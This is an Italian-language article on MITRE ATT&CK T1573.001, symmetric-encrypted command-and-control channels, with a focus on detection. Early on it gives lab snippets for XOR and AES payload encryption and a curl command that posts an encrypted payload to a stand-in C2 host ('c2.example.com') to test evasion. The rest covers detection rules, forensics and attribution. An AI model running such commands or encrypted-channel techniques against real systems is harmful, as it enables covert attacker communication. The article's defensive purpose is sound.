Crittografia Simmetrica: Encrypted Channel: Symmetric Cryptography (T1573.001)

Iniziare con implementazioni XOR personalizzate permette di comprendere i fondamenti. Su Linux, creare un semplice encoder XOR:

echo -n "comando_c2" | xxd -p | sed 's/../\\x&/g'

Per simulare il comportamento di Lazarus Group, implementare XOR con operazioni ADD/SUB richiede uno script Python che combini le trasformazioni:

def custom_xor(data, key=0x5a):
    return bytes([(b ^ key) + 3 for b in data])

Windows PowerShell offre capacità native per RC4. Replicare il comportamento di malware come BADNEWS diventa:

$bytes = [System.Text.Encoding]::UTF8.GetBytes($command)
$encrypted = $bytes | ForEach-Object { ($_ -bxor 0x23) -band 0xFF }

Per simulazioni AES più sofisticate come quelle di APT33, OpenSSL fornisce implementazioni standard:

openssl enc -aes-256-cbc -in payload.txt -out encrypted.bin -K [chiave_hex] -iv [iv_hex]

L'aspetto critico sta nel testare diverse dimensioni di chiave. Malware come Carbanak usa RC2 in modalità CBC, mentre BRONZE BUTLER alterna tra RC4 per Datper e AES per xxmm. Questa variabilità richiede un approccio modulare nel laboratorio.

Per replicare traffico C2 realistico, combinare encryption con protocolli standard. Cobalt Strike implementa AES-256-CBC con HMAC-SHA-256:

echo -n "beacon_data" | openssl dgst -sha256 -hmac "chiave_segreta"

L'embedding di payload cifrati in richieste HTTP legittime aumenta l'evasione. Testare con curl:

curl -X POST https://c2.example.com/update -H "Content-Type: application/octet-stream" --data-binary @encrypted.bin

La detection comportamentale inizia identificando processi anomali che caricano librerie crittografiche. Su Windows, Sysmon cattura il caricamento di bcryptprimitives.dll o aes.dll da processi inusuali:

<RuleGroup name="" groupRelation="or">
  <ImageLoad onmatch="include">
    <ImageLoaded condition="contains any">bcryptprimitives.dll;aes.dll</ImageLoaded>
    <Image condition="excludes any">chrome.exe;firefox.exe;teams.exe</Image>
  </ImageLoad>
</RuleGroup>

L'entropia del payload rappresenta un indicatore chiave. Traffico con entropia superiore a 7.5 su porte non-TLS merita investigazione immediata. NetFlow può rivelare pattern di byte distribution anomali quando il rapporto tra dati inviati/ricevuti diverge significativamente.

Linux richiede monitoring di syscall crypto_alloc_skcipher attraverso auditd. Processi come bash o python che invocano routine crittografiche generano alert:

auditctl -a always,exit -F arch=b64 -S socket -F success=1 -k crypto_connections

La correlazione temporale è fondamentale. Il caricamento di moduli crypto seguito da connessioni outbound entro 30 secondi indica possibile C2. Implementare regole che correlino eventi Sysmon ID 7 (DLL Load) con ID 3 (Network Connection).

Per macOS, il framework Security genera log specifici quando processi non-browser utilizzano encryption API. Unified logging cattura questi eventi filtrabili per processo padre anomalo.

ESXi presenta sfide uniche. Monitorare /var/log/vpxd.log per pattern di encryption da servizi core come hostd o vpxa verso destinazioni non-VMware. Il baseline del traffico management normale diventa critico per ridurre falsi positivi.

Gli artefatti Windows iniziano nel registro. Chiavi sotto HKLM\SYSTEM\CurrentControlSet\Control\Cryptography rivelano provider crypto caricati. Il timestamp di modifica indica quando malware ha inizializzato routine di encryption.

La memoria volatile preserva chiavi di sessione. Process memory dump di svchost.exe compromessi spesso contiene stringhe XOR key come "YHCRA" usata da FakeM o "warzone160\x00" di WarzoneRAT. Volatility3 con plugin strings accelera l'identificazione:

python vol.py -f memory.dmp windows.strings | grep -E "[A-Za-z0-9]{8,32}" | sort -u

I file di paging Windows possono contenere frammenti di traffico pre-encryption. Cercare pattern di byte ripetuti che indicano padding block cipher o header custom. HAMMERTOSS lascia tracce quando appende comandi cifrati a file immagine.

Su Linux, /proc/[pid]/fd/ rivela socket aperti con encryption attivo. Il contenuto di /proc/[pid]/environ può esporre chiavi hardcoded passate come variabili ambiente. Malware come Ebury usa l'IP del client come chiave, rendendo l'analisi del traffico catturato essenziale.

L'analisi temporale dei log di rete correla l'inizio della cifratura con altri IOC. Un improvviso aumento dell'entropia del traffico HTTP verso un dominio specifico, come osservato con SUNBURST e il suo XOR single-byte, marca il momento dell'attivazione.

macOS Unified Logs in /var/db/diagnostics contiene eventi Security.framework con timestamp precisi. La sequenza di chiamate crypto API prima di connessioni sospette ricostruisce l'inizializzazione del canale cifrato.

Per ESXi, i vmware.log nei datastore VM possono catturare anomalie quando malware interagisce con l'hypervisor usando canali cifrati non standard.

Lazarus Group dimostra evoluzione costante nelle implementazioni crypto. Dalla custom XOR con ADD/SUB operations a Caracachs encryption fino ad AES standard, il gruppo adatta la complessità al target. La presenza di multiple famiglie con encryption diversi suggerisce team development separati.

APT28 mantiene preferenza per algoritmi custom implementati in Delphi, indicando capacità di sviluppo interno consolidate. Questo contrasta con APT33 che utilizza implementazioni AES standard, suggerendo focus su affidabilità piuttosto che offuscamento.

BRONZE BUTLER esibisce approccio modulare: RC4 per Datper, AES per xxmm, custom XOR per RarStar. Questa diversificazione indica struttura operativa compartimentalizzata con team specializzati per tool specifico.

La geografia influenza le scelte crypto. Gruppi Asia-Pacific come Higaisa e Mustang Panda mostrano preferenza per RC4 e AES-128, mentre attori Middle East come MuddyWater implementano AES per tutti i componenti C2.

L'overlap negli algoritmi rivela possibili condivisioni di codice. Inception e ZIRCONIUM utilizzano entrambi AES per C2, ma con implementazioni diverse - il primo con librerie standard, il secondo con routine custom. Questo pattern suggerisce evoluzione parallela piuttosto che collaborazione diretta.

Le campagne recenti mostrano trend verso encryption modulare. Operation Dream Job implementa AES con key negotiation dinamica, mentre 3CX Supply Chain Attack utilizza multiple layers di offuscamento. L'aumento della sofisticazione riflette la pressione delle capacità di detection migliorate.

Framework MITRE ATT&CK T1573.001, campagne Frankenstein, Operation Dream Job, RedPenguin e 3CX Supply Chain Attack documentate, detection strategy DET0143 per identificazione multi-piattaforma di canali cifrati simmetrici.